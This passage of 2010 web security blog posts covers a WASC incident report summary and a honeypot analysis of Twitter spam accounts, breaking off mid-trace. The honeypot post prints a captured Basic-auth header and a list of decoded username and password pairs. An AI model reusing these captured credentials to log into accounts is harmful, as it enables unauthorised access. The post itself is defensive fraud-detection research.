<br />
<br />Casino crimes against the patrons are scenarios where cheaters try and snatch other players chips, etc... In webappsec, this would be similar to XSS/CSRF types of attacks that aim to attack the end user through the web application.
<br /></div><div>
<br /></div><div><meta charset="utf-8"><span style="font-weight: bold; ">Anyone can be a cheat</span>
<br />It would be fool hearty to only focus on stereotypes when attempting to identify cheats. Cheats come in all shapes, sizes and ages. Once again, it is not who you are but what you are doing. Similarly, in webappsec, while there is some useful IP reputation data that can be used, you must actually review what the web transaction is actually doing in order to be able to identify possible malicious behavior.</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-5645569839667192010-09-09T09:56:00.006-04:002010-09-22T14:51:20.330-04:00WASC WHID Semi-Annual Report for 2010<meta charset="utf-8"><span class="Apple-style-span" style="font-family: 'Segoe UI', 'Lucida Grande', Arial; color: rgb(68, 68, 68); font-size: 13px; line-height: 19px; "><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "><span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.2em; color: rgb(51, 51, 51); ">The Web Hacking Incident Database (WHID) is a project dedicated to maintaining a record of web application-related security incidents. WHID’s purpose is to serve as a tool for raising awareness of web application security problems and to provide information for statistical analysis of web application security incidents. Unlike other resources covering web site security – which focus on the technical aspect of the incident – the WHID focuses on the impact of the attack. Trustwave's SpiderLabs is a WHID project contributor.</span>
<br />
<br /></p><h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: bold; font-style: inherit; font-size: 20px; font-family: 'Segoe UI', 'Lucida Grande', Arial, sans-serif; vertical-align: baseline; line-height: 1.25em; color: rgb(68, 68, 68); ">Report Summary Findings</h1><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">An analysis of the Web hacking incidents from the first half of 2010 performed by Trustwave’s SpiderLabs Security Research team shows the following trends and findings:</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "> </p><ul style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 3em; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; "><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">A steep rise in attacks against the financial vertical market is occurring in 2010, and is currently the no. 3 targeted vertical at 12 percent. This is mainly a result of cybercriminals targeting small to medium businesses’ (SMBs) online banking accounts.</li><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">Corresponding to cybercriminals targeting online bank accounts, the use of Banking Trojans (which results in stolen authentication credentials) made the largest jump for attack methods (Banking Trojans + Stolen Credentials).</li><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">Application downtime, often due to denial of service attacks, is a rising outcome.</li><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">Organizations have not implemented proper Web application logging mechanisms and thus are unable to conduct proper incident response to identify and correct vulnerabilities. This resulted in the no. 1 “unknown” attack category.</li></ul><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "> </p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">
<br /></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-style: inherit; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "><span class="Apple-style-span" style="font-size: large;"><b>WHID Top 10 Risks for 2010</b></span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">As part of the WHID analysis, here is a current Top 10 listing of the <a href="http://projects.webappsec.org/Threat-Classification">application weaknesses</a> that are actively being exploited (with example attack method mapping in parentheses). Hopefully this data can be used by organizations to re-prioritize their remediation efforts.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">
<br /></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "><!--StartFragment--> <table border="0" cellpadding="0" cellspacing="0" width="366" style="border-collapse: collapse;width:366pt"> <colgroup><col width="56" style="mso-width-source:userset;width:56pt"> <col width="310" style="mso-width-source:userset;width:310pt"> </colgroup><tbody><tr height="29" style="mso-height-source:userset;height:29.2pt"> <td height="29" class="oa1" width="56" style="height:29.2pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-size:12.0pt;font-family: Arial;mso-ascii-font-family:Arial;mso-bidi-font-family:Arial;color:white; mso-color-index:14;mso-font-kerning:12.0pt;language:en-US;font-weight:bold"> </span></p> </td> <td class="oa1" width="310" style="width:310pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-size: 12pt; font-family: Calibri; font-weight: bold; ">WHID</span><span style="font-size: 12pt; font-family: Calibri; font-weight: bold; vertical-align: baseline; "> Top 10 for 2010</span><span style="font-size:12.0pt;font-family:Calibri; mso-ascii-font-family:Calibri;mso-bidi-font-family:Arial;color:white; mso-color-index:14;mso-font-kerning:12.0pt;language:en-US;font-weight:bold"> </span></p> </td> </tr> <tr height="20" style="mso-height-source:userset;height:20.4pt"> <td height="20" class="oa2" width="56" style="height:20.4pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>1</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa3" width="310" style="width:310pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;margin-right:0in; text-align:left;direction:ltr;unicode-bidi:embed;vertical-align:top; mso-line-break-override:none;word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Improper Output Handling (XSS and Planting of Malware)</b></span></p> </td> </tr> <tr height="24" style="mso-height-source:userset;height:24.0pt"> <td height="24" class="oa4" width="56" style="height:24.0pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>2</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa5" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Insufficient Anti-Automation (Brute Force and </b></span><span style="font-family: Arial; color: black; "><b>DoS</b></span><span style="font-family: Arial; color: black; "><b>)</b></span></p> </td> </tr> <tr height="22" style="mso-height-source:userset;height:21.6pt"> <td height="22" class="oa6" width="56" style="height:21.6pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>3</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa7" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Improper Input Handling (SQL Injection)</b></span></p> </td> </tr> <tr height="25" style="mso-height-source:userset;height:25.2pt"> <td height="25" class="oa4" width="56" style="height:25.2pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>4</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa5" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Insufficient Authentication (Stolen Credentials/Banking Trojans)</b></span></p> </td> </tr> <tr height="24" style="mso-height-source:userset;height:23.75pt"> <td height="24" class="oa6" width="56" style="height:23.75pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>5</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa7" width="310" style="width:310pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;margin-right:0in; text-align:left;direction:ltr;unicode-bidi:embed;vertical-align:top; mso-line-break-override:none;word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Application </b></span><span style="font-family: Arial; color: black; "><b>Misconfiguration</b></span><span style="font-family: Arial; color: black; "><b> (Detailed</b></span><span style="font-family: Arial; color: black; vertical-align: baseline; "><b> error messages)</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> </tr> <tr height="29" style="mso-height-source:userset;height:29.2pt"> <td height="29" class="oa4" width="56" style="height:29.2pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>6</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa5" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Insufficient Process Validation</b></span><span style="font-family: Arial; color: black; vertical-align: baseline; "><b> (CSRF and DNS Hijacking)</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> </tr> <tr height="29" style="mso-height-source:userset;height:29.2pt"> <td height="29" class="oa6" width="56" style="height:29.2pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>7</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa7" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Insufficient</b></span><span style="font-family: Arial; color: black; vertical-align: baseline; "><b> Authorization (Predictable Resource Location/Forceful Browsing)</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> </tr> <tr height="18" style="mso-height-source:userset;height:18.45pt"> <td height="18" class="oa4" width="56" style="height:18.45pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>8</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa5" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Abuse of Functionality (CSRF/Click-Fraud)</b></span></p> </td> </tr> <tr height="29" style="mso-height-source:userset;height:29.2pt"> <td height="29" class="oa6" width="56" style="height:29.2pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>9</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa7" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Insufficient Password Recovery (Brute Force)</b></span></p> </td> </tr> <tr height="29" style="mso-height-source:userset;height:29.2pt"> <td height="29" class="oa4" width="56" style="height:29.2pt;width:56pt"> <p style="margin-top:0pt;margin-bottom:0pt;margin-left:0in;text-align:left; direction:ltr;unicode-bidi:embed;mso-line-break-override:none;word-break: normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>10</b></span><span style="font-family: Arial; color: black; "><b> </b></span></p> </td> <td class="oa5" width="310" style="width:310pt"> <p style="line-height:normal;margin-top:0pt;margin-bottom:0pt;margin-left: 0in;margin-right:0in;text-indent:0in;text-align:left;direction:ltr; unicode-bidi:embed;vertical-align:top;mso-line-break-override:none; word-break:normal;punctuation-wrap:hanging"><span style="font-family: Arial; color: black; "><b>Improper </b></span><span style="font-family: Arial; color: black; "><b>Filesystem</b></span><span style="font-family: Arial; color: black; "><b> Permissions (info Leakages)</b></span><span style="font-size:12.0pt;font-family:Arial;mso-ascii-font-family:Arial; mso-bidi-font-family:Arial;color:black;mso-color-index:1;mso-font-kerning: 12.0pt;language:en-US;font-weight:normal"> </span></p> </td> </tr> </tbody></table> <!--EndFragment--></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">
<br /></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">Download the <a href="http://projects.webappsec.org/f/WHIDWhitePaper_WASC.pdf">full report</a>.</p></span>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-8135297892485492002010-07-12T15:19:00.002-04:002010-07-12T15:30:30.821-04:00Moving to the Trustwave SpiderLabs Research Team<i>Submitted by Ryan Barnett 07/12/2010</i><div>
<br /></div><div>As you may have heard, <a href="https://www.trustwave.com/pressReleases.php?n=062210&hp=1">Trustwave has acquired Breach Security</a>! As part of this move, I am excited to announce that I have now joined the Trustwave <a href="https://www.trustwave.com/spiderLabs.php">SpiderLabs Research Team</a>. I am extremely excited to join such a great group of people and to contribute to the team. As part of my job, I will be focusing in more time on updating signatures for Trustwave's WAF products (which includes both open source ModSecurity and WebDefend). I will also be making more updates to the <a href="http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project">OWASP ModSecurity Core Rule Set</a> (CRS).</div><div>
<br /></div><div>Speaking of the CRS, if anyone is going to be out at Blackhat in Las Vegas at the end of the month, please try and come by the <a href="http://www.blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html">Arsenal Event</a> on Thursday morning as I will be presenting the ModSecurity CRS and the <a href="http://www.modsecurity.org/demo/">Demo page</a> at Kiosk #3.</div><div>
<br /></div><div>Hope to see you all there!</div><meta equiv="content-type" content="text/html; charset=utf-8">Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-58381851337968822792010-06-21T13:21:00.003-04:002010-06-21T14:35:23.025-04:00Spammers using Twitter's Update Status API<i>Submitted by Ryan Barnett 06/21/2010</i><div><br /></div><div>I was reviewing the logs over at our <a href="http://projects.webappsec.org/Distributed-Open-Proxy-Honeypots">WASC Distributed Open Proxy Honeypot Project</a> and I noticed some interesting traffic. It looks as though Spammers are using the Twitter API to post their messages to their fake accounts. While the news of Spammers doing this is not new, the WASC honeypots are able to take a different vantage point and correlate account data.</div><div><br /></div><div>Here is one example Spam posting transaction: </div><div><br /></div><div><br /></div><div><span class="Apple-style-span" style=" color: rgb(51, 51, 51); line-height: 13px; font-family:Arial, Helvetica, Geneva, sans-serif;font-size:12px;"><div class="border" style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(216, 216, 216); border-right-color: rgb(216, 216, 216); border-bottom-color: rgb(216, 216, 216); border-left-color: rgb(216, 216, 216); width: 925px; overflow-x: auto; "><table id="summaryTable" cellpadding="0" cellspacing="0" style="width: 924px; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(255, 255, 255); border-left-width: 1px; border-left-style: solid; border-left-color: rgb(255, 255, 255); "><tbody><tr><td style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; "><span class="httpHeader" style="font: normal normal bold 14px/16px Arial, Helvetica, Geneva, sans-serif; font-weight: bold; padding-top: 2px; padding-bottom: 2px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(239, 243, 252); display: block; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(240, 240, 240); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(240, 240, 240); background-position: initial initial; background-repeat: initial initial; ">Request Headers</span></td></tr><tr><td class="contentCellPre" style="font: normal normal normal 12px/16px 'Courier New', Courier; padding-top: 3px; padding-right: 8px; padding-bottom: 3px; padding-left: 8px; white-space: wrap; "><span class="httpFirstLine" style="font-weight: bold; color: rgb(68, 68, 68); padding-top: 2px; padding-bottom: 2px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 253, 238); display: block; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(240, 240, 240); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(240, 240, 240); background-position: initial initial; background-repeat: initial initial; ">POST http://twitter.com/statuses/update.xml HTTP/1.1</span><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Authorization:</span> Basic Sm9oblRNYWxtOm5rdGpjcjEyMw==<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">X-Twitter-Client-URL:</span> http://yusuke.homeip.net/twitter4j/en/twitter4j-2.0.8.xml<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Accept-Encoding:</span> gzip<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: nowrap; color: rgb(68, 68, 68); ">User-Agent:</span> twitter4j http://yusuke.homeip.net/twitter4j/ /2.0.8<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">X-Twitter-Client-Version:</span> 2.0.8<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Content-Type:</span> application/x-www-form-urlencoded<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Content-Length:</span> 161<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Host:</span> twitter.com<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Accept:</span> text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Proxy-Connection:</span> keep-alive<br /></td></tr></tbody></table></div><br /><div class="border" style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(216, 216, 216); border-right-color: rgb(216, 216, 216); border-bottom-color: rgb(216, 216, 216); border-left-color: rgb(216, 216, 216); width: 925px; overflow-x: auto; "><table id="summaryTable" cellpadding="0" cellspacing="0" style="width: 924px; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(255, 255, 255); border-left-width: 1px; border-left-style: solid; border-left-color: rgb(255, 255, 255); "><tbody><tr><td style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; "><span class="httpHeader" style="font: normal normal bold 14px/16px Arial, Helvetica, Geneva, sans-serif; font-weight: bold; padding-top: 2px; padding-bottom: 2px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(239, 243, 252); display: block; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(240, 240, 240); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(240, 240, 240); background-position: initial initial; background-repeat: initial initial; ">Request Body</span></td></tr><tr><td class="contentCellPre" style="font: normal normal normal 12px/16px 'Courier New', Courier; padding-top: 3px; padding-right: 8px; padding-bottom: 3px; padding-left: 8px; white-space: wrap; ">status=%40ldegelund+why+not+offer+work-from-home+projects++to+your+readers+by+th <span class="grayText" style=" ;color:gray;">\</span><br />is+terrific+service+-+http%3A%2F%2Fproj.li%2FaOGdjN+Good+Luck%21&source=Twitter4 <span class="grayText" style=" ;color:gray;">\</span><br />J</td></tr></tbody></table></div></span></div><div><br /></div><div>Notice the Authorization request header as the Twitter API requires basic authentication. The decoded user credentials are (format is username:password):</div><div><blockquote><span class="Apple-style-span" style="font-family:'courier new';">JohnTMalm:nktjcr123</span></blockquote></div><div>Now, looking at this one transaction in isolation doesn't yield much interesting data. What is interesting, however, is that I then did a search for all transactions to Twitter's API for June 21, 2010 and I found many more transactions all from different client IP addresses. I extracted out all of the unique Authorization headers and decoded them:</div><div><div></div><blockquote><div><span class="Apple-style-span" style="font-family:'courier new';">JohnTMalm:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">NicholeFBethune:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">LindaCTomas:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">ElsieJJanu:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">PhyllisLMoor:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">CynthiaLMille:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">JaniceRKnudson:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">harli_lona:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">MaryCShahh:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">DorothyRFrame:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">jeffpadams:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">AmyMSiege:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">LynJLaw:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">SteveMWesle:nktjcr123</span></div></blockquote><div></div></div><div>Notice anything interesting? They all have the exact same password. Since the password isn't one of the typical dictionary ones where it may be possible to have some users actually use the same password, we can only conclude that all of the accounts are controlled by the same person(s).</div><div><br /></div><div><b>Recommendation for web sites</b></div><div>When new accounts are being created, check the new password against some form of hash tracking list to see how many users have that same password. If the password is widely used, then it can either be denied or placed on some form of fraud watch list.</div><div><br /></div><div>If you check out the twitter pages of these fake accounts, you will see that they all have profile pictures of women (even though some of the account names seem male). This may be an attempt to try and disarm readers and entice them to click on the job/tool related links. </div><div><br /></div><div>I checked out one of the links. The first URL shortener resolved to a second URL shortener and then onto the final site - DoNanza</div><div><div></div><blockquote><div>$ wget http://proj.li/d62dIW</div><div>--2010-06-21 14:18:45-- http://proj.li/d62dIW</div><div>Resolving proj.li... 74.55.224.85</div><div>Connecting to proj.li|74.55.224.85|:80... connected.</div><div>HTTP request sent, awaiting response... 301 Moved Permanently</div><div>Location: http://bit.ly/d62dIW [following]</div><div>--2010-06-21 14:18:45-- http://bit.ly/d62dIW</div><div>Resolving bit.ly... 128.121.254.201, 128.121.254.205, 168.143.173.13, ...</div><div>Connecting to bit.ly|128.121.254.201|:80... connected.</div><div>HTTP request sent, awaiting response... 301 Moved</div><div>Location: https://www.donanza.com/publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb#uexox 